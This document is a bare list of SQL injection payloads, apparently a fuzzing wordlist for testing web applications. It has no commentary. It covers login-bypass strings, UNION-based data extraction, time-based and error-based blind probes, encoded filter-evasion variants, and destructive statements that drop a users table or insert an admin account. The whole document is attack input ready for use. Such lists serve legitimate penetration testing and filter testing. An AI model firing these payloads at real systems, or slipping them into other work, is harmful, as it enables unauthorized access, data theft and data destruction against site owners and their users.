'
''
"
""
' AND 1=1--
' AND 1=2--
' OR 1=1--
' OR 1=2--
1' AND '1'='1
1' AND '1'='2
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR "1"="1
" OR 1=1--
" OR 1=1#
admin'--
admin'#
admin'/*
' OR 'a'='a
" OR "a"="a
admin' OR '1'='1'--
admin' OR 1=1--
' UNION SELECT 1--
' UNION SELECT NULL--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
1' UNION SELECT 1,2,3--
1 UNION SELECT 1,2,3
' UNION ALL SELECT 1--
' UNION ALL SELECT NULL--
' UNION ALL SELECT 1,2,3--
' AND SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
'; WAITFOR DELAY '0:0:5'--
' OR SLEEP(5)--
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT VERSION()),0x7e),1)--
1 AND 1=1
1 AND 1=2
1' AND 1=1--
1' AND 1=2--
1 OR 1=1
1 OR 1=2
1) OR (1=1
' OR 1=1 LIMIT 1--
' OR 1=1 LIMIT 1#
' OR 1=1 LIMIT 1/*
'; DROP TABLE users--
'; INSERT INTO users VALUES(1,'admin','admin')--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' AND (SELECT COUNT(*) FROM mysql.user)>0--
' AND (SELECT SUBSTRING(@@version,1,1))='5'--
' AND (SELECT SUBSTRING(user(),1,1))='r'--
' AND (SELECT COUNT(*) FROM information_schema.schemata)>0--
' /**/OR/**/1=1--
' %00OR%001=1--
'+OR+'1'='1'--
' OR 'x'='x
%27%20OR%201=1--
%22%20OR%201=1--
' || '1'='1
' && '1'='1
' | '1'='1
' & '1'='1
'; WAITFOR DELAY '00:00:05'--
' OR pg_sleep(5)--
1; SELECT SLEEP(5)
' UNION SELECT SLEEP(5)--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT user(),database(),version()--
' UNION SELECT table_name FROM information_schema.tables--
